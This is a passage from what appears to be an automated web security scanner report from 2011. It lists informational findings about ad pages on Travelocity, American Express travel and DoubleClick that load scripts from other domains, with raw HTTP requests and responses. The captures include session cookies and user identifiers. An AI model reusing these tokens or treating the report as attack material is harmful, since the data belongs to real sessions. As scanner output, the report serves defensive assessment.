X-Server: prdlmn2714
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:12:46 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 2276
Content-Type: text/html

<IFRAME SRC="http://ad.doubleclick.net/adi/N6333.1207.TRAVELOCITY.COM/B5568861.2;sz=160x600;click=http://dm.travelocity.com/event.ng/Type%3dclick%26FlightID%3d127075%26AdID%3d169968%26TargetID%3d32592
...[SNIP]...
,9906,11162,12194,12196,12728,12736,12804%26Redirect%3d;ord=bNukzwK,bhirWpRzqlhl?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6333.1207.TRAVELOCITY.COM/B5568861.2;abr=!ie;sz=160x600;ord=bNukzwK,bhirWpRzqlhl?">
</SCRIPT>
...[SNIP]...

20.10. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?Service=TRAVELOCITY&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR&leavingDate=mm/dd/yyyy&returningDate=mm/dd/yyyy&city=bos&cityCountryCode=US&dateFormat=mm/dd/yyyy&searchMode=city&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; IPE_S_TMP_910=910; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=check#true#1317600587|session#1317600481056-80236#1317602387|PC#1317600481056-80236.19#1318810127; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.1.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:01 GMT
Server: Apache
X-Server: prdlmn0408
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:09:01 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 239
Content-Type: text/html

<script type="text/javascript">
var pubId=26071;
var siteId=26072;
var kadId=21044;
var kadwidth=160;
var kadheight=600;
var kadtype=1;
</script>
<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">
</script>

20.11. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771875&tile=128609801075344&section=results

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771875&tile=128609801075344&section=results

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771875&tile=128609801075344&section=results HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=session#1317600481056-80236#1317602632|PC#1317600481056-80236.19#1318810372|check#true#1317600832; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.3.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:28 GMT
Server: Apache
X-Server: prdlmn2714
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:14:28 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 239
Content-Type: text/html

<script type="text/javascript">
var pubId=26071;
var siteId=26072;
var kadId=21044;
var kadwidth=160;
var kadheight=600;
var kadtype=1;
</script>
<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">
</script>

20.12. http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=771852&tile=128609801075344&section=results

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=771852&tile=128609801075344&section=results

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=771852&tile=128609801075344&section=results HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=session#1317600481056-80236#1317602632|PC#1317600481056-80236.19#1318810372|check#true#1317600832; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.3.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:25 GMT
Server: Apache
X-Server: prdlmn2714
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:14:25 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 238
Content-Type: text/html

<script type="text/javascript">
var pubId=26071;
var siteId=26072;
var kadId=21043;
var kadwidth=728;
var kadheight=90;
var kadtype=1;
</script>
<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">
</script>

20.13. http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&adloc=NA&random=656361&tile=564238840132219&section=details

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&adloc=NA&random=656361&tile=564238840132219&section=details

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&adloc=NA&random=656361&tile=564238840132219&section=details HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelDetail.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?tab=guide&tripType=hotel&propertyId=4810&airport=BOS&resetReview=true&hotelQKey=-2237575859332798600&tsHotelQKey=-2237575859332798600&reviewPage=reviewStart&locLink=HOTEL.HOTELAVAILABILITYLISTLITE1|NAT1&dr=4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; IPE_S_TMP_910=910; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.1.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998; mbox=session#1317600481056-80236#1317602524|PC#1317600481056-80236.19#1318810264|check#true#1317600724

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:12:44 GMT
Server: Apache
X-Server: prdlmn2714
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:12:44 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 238
Content-Type: text/html

<script type="text/javascript">
var pubId=26071;
var siteId=26072;
var kadId=21043;
var kadwidth=728;
var kadheight=90;
var kadtype=1;
</script>
<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">
</script>

20.14. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /activityi;src=2588797;type=nausc826;cat=nauss008;ord=2134735815;u=ccf4a420af8b480f8413efb42e880287;u1=Hotel;u2=178239;u4=20111004%7C20111007;u6=1;u7=1%7C0;u9=;u11=0;u12=;u13=4215%7C15861%7C23415%7C1680030%7C2800816;u14=429.0%7C339.15%7C289.0%7C432.33%7C308.54;u16=USD HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 03 Oct 2011 00:10:36 GMT
Expires: Mon, 03 Oct 2011 00:10:36 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 752
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><IFRAME width="1" he
...[SNIP]...
</IFRAME><script type="text/javascript"
src="http://a.cdn.intentmedia.net/javascripts/intent_media_expedia_beacon.js">

</script>
...[SNIP]...

20.15. https://go.americanexpress-travel.com/hotel/HotelCobrand.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://go.americanexpress-travel.com
Path:   /hotel/HotelCobrand.do

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /hotel/HotelCobrand.do;jsessionid=959CC77E68C7D0C1E45369CF857BC3F1.p0716?Service=AMEX&leavingDate=10/04/11&returningDate=10/07/11&searchMode=city&city=Boston,%20United%20States&cityCountryCode=&hotelName=&adults=1&?Service=AMEX&WA1=03010&WA2=%EF%BF%BDid&WA4=%EF%BF%BDid&cmpid=af-ctn-af000063&widgetid=ratefind-hot HTTP/1.1
Host: go.americanexpress-travel.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=amex&grp=21&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B206380952%3B28845483%3Bq%3Fhttp%3A%2F%2Fgo.americanexpress-travel.com%2Fhotel%2FHotelCobrand.do%3FService%3DAMEX%26leavingDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D%26returningDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D%26searchMode%3Dcity%26city%3D%24%7Bcity%7D%2C%2520%24%7Bcountryn%7D%26cityCountryCode%3D%26hotelName%3D%26adults%3D%24%7Badults%7D%26%3FService%3DAMEX%26WA1%3D03010%26WA2%3D%25eaid%26WA4%3D%25ecid%26cmpid%3Daf-ctn-af000063%26widgetid%3Dratefind-hot&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=141&pos=2&aii=2943600b-8719-4374-99f1-66c3d37bf8d3&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tyrg1st=5CE502CBA48A0513; JSID=959CC77E68C7D0C1E45369CF857BC3F1.p0716; TUID=987675b9-11f8-46ee-8be4-90a9f5cad5fa; JSESSIONID=959CC77E68C7D0C1E45369CF857BC3F1.p0716; Service=AMEX

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:41 GMT
Server: Apache
Set-Cookie: JSESSIONID=F117AC921CCE045ED73E1F0312D428B7.p0716; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7238

<!-- PAGE: TimeKeeper -->
<link rel="icon" href="https://axptravel.americanexpress.com/ctnwt/favicon.ico"/>
<link rel="shortcut icon" href="https://axptravel.americanexpress.com/ctnwt/favicon.ico"/>


...[SNIP]...
</div>
<script type="text/javascript" src="https://axptravel.americanexpress.com/ctnwt/theme/shared/js/icrossing/ctniclive.js"></script>
...[SNIP]...

20.16. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pagead/ads?client=ca-pub-8213526369189339&output=html&h=280&slotname=9968660253&w=336&ea=0&flash=10.3.183&url=http%3A%2F%2Fwww.trip.com%2Fhotels.html&dt=1317602228730&bpp=7&shv=r20110921&jsv=r20110914&correlator=1317602228802&frm=7&adk=3345861870&ga_vid=2049523975.1317602099&ga_sid=1317602099&ga_hid=270757924&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=23&u_nmime=106&dff=times%20new%20roman&dfs=16&adx=669&ady=257&biw=1058&bih=906&ifk=3906417519&prodhost=googleads.g.doubleclick.net&fu=4&ifi=1&dtd=75 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 03 Oct 2011 00:37:41 GMT
Server: cafe
Cache-Control: private
Content-Length: 13423
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

20.17. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-0666653885873574&output=html&h=250&slotname=7372794801&w=300&ea=0&flash=10.3.183&url=http%3A%2F%2Fads.pubmatic.com%2Fhosteddefaulttags%2F26620%2F26621%2F21556%2F559%2Fadtag.html&dt=1317606797018&bpp=7&shv=r20110921&jsv=r20110914&correlator=1317606797027&frm=8&adk=4114293891&ga_vid=1069027809.1317606797&ga_sid=1317606797&ga_hid=1887245699&ga_fc=0&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=23&u_nmime=106&dff=times%20new%20roman&dfs=16&adx=0&ady=0&biw=-12245933&bih=-12245933&ifk=2019610879&loc=http%3A%2F%2Fads.pubmatic.com%2FHostedDefaultTags%2F26620%2F26621%2F21556%2F559%2Fadtag.html&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=12 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0666653885873574&output=html&h=250&slotname=7372794801&w=300&ea=0&flash=10.3.183&url=http%3A%2F%2Fads.pubmatic.com%2Fhosteddefaulttags%2F26620%2F26621%2F21556%2F559%2Fadtag.html&dt=1317606797018&bpp=7&shv=r20110921&jsv=r20110914&correlator=1317606797027&frm=8&adk=4114293891&ga_vid=1069027809.1317606797&ga_sid=1317606797&ga_hid=1887245699&ga_fc=0&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=23&u_nmime=106&dff=times%20new%20roman&dfs=16&adx=0&ady=0&biw=-12245933&bih=-12245933&ifk=2019610879&loc=http%3A%2F%2Fads.pubmatic.com%2FHostedDefaultTags%2F26620%2F26621%2F21556%2F559%2Fadtag.html&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=12
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 03 Oct 2011 01:53:23 GMT
Server: cafe
Cache-Control: private
Content-Length: 1264
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
< - DO NOT MODIFY -->
<SCRIPT SRC="http://ad.dedicatedmedia.com/ttj?id=562058&cb=1155309149&pubclick=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BjBjYkxWJTt3uAYqE2gXXz8mJCPWyn_oBtZyU8CPNl96RbgAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0wNjY2NjUzODg1ODczNTc0oAGZgO_qA7IBEGFkcy5wdWJtYXRpYy5jb226AQozMDB4MjUwX2FzyAEJ2gFKaHR0cDovL2Fkcy5wdWJtYXRpYy5jb20vaG9zdGVkZGVmYXVsdHRhZ3MvMjY2MjAvMjY2MjEvMjE1NTYvNTU5L2FkdGFnLmh0bWyYAvoBwAIEyALvpLwLqAMB9QMAAABE&num=1&sig=AOD64_0nT7x-GHaafkiuKILnL9QPfI4YQQ&client=ca-pub-0666653885873574&adurl=" TYPE="text/javascript"></SCRIPT>
...[SNIP]...

20.18. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-0666653885873574&output=html&h=250&slotname=7372794801&w=300&ea=0&flash=10.3.183&url=http%3A%2F%2Fads.pubmatic.com%2Fhosteddefaulttags%2F26620%2F26621%2F21556%2F559%2Fadtag.html&dt=1317606797018&bpp=7&shv=r20110921&jsv=r20110914&correlator=1317606797027&frm=8&adk=4114293891&ga_vid=1069027809.1317606797&ga_sid=1317606797&ga_hid=1887245699&ga_fc=0&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=23&u_nmime=106&dff=times%20new%20roman&dfs=16&adx=0&ady=0&biw=-12245933&bih=-12245933&ifk=2019610879&loc=http%3A%2F%2Fads.pubmatic.com%2FHostedDefaultTags%2F26620%2F26621%2F21556%2F559%2Fadtag.html&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=12 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 03 Oct 2011 01:53:13 GMT
Server: cafe
Cache-Control: private
Content-Length: 1263
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
< - DO NOT MODIFY -->
<SCRIPT SRC="http://ad.dedicatedmedia.com/ttj?id=562058&cb=592559840&pubclick=http://adclick.g.doubleclick.net/aclk?sa=l&ai=ByqSqiRWJTs3sEc2oqwGP1s3TDPWyn_oBtZyU8CPNl96RbgAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0wNjY2NjUzODg1ODczNTc0oAGZgO_qA7IBEGFkcy5wdWJtYXRpYy5jb226AQozMDB4MjUwX2FzyAEJ2gFKaHR0cDovL2Fkcy5wdWJtYXRpYy5jb20vaG9zdGVkZGVmYXVsdHRhZ3MvMjY2MjAvMjY2MjEvMjE1NTYvNTU5L2FkdGFnLmh0bWyYAvoBwAIEyALvpLwLqAMB9QMAAABE&num=1&sig=AOD64_21y1nu5mWiQMOEeNytMeOPMZRuvg&client=ca-pub-0666653885873574&adurl=" TYPE="text/javascript"></SCRIPT>
...[SNIP]...

20.19. http://hublotnation.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hublotnation.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: hublotnation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hublot.com/site/loader.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:04:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:04:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
